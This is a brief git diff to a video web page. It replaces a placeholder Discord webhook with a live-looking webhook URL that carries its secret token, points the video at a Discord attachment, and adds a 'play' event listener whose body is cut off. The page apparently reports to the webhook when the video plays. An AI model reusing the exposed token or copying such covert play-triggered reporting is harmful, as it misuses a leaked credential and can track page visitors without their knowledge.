--- a/index.html
+++ b/index.html
@@ -7,12 +7,12 @@
 </head>
 <body>
     <video id="myVideo" width="640" height="360" controls>
-        <source src="your-video.mp4" type="video/mp4">
+        <source src="https://cdn.discordapp.com/attachments/1196112588359073882/1276709556344590347/IMG_2768.MP4?ex=66ca83ee&is=66c9326e&hm=f1cd2f873ee395ebe06c2d1e97e686b7fcf90fd2defc1b41cc3607f05b401567&" type="video/mp4">
         Your browser does not support the video tag.
     </video>
 
     <script>
-        const webhookURL = "YOUR_DISCORD_WEBHOOK_URL";
+        const webhookURL = "https://discord.com/api/webhooks/1249236256492093461/qI2VFYOH4nlWGsCJp9dKOruyIBDxDFQVbqc_WKZzlOt27JKydtCEI2uj1hSOC4q2aYZ5";
         
         const video = document.getElementById('myVideo');
         video.addEventListener('play', () => {
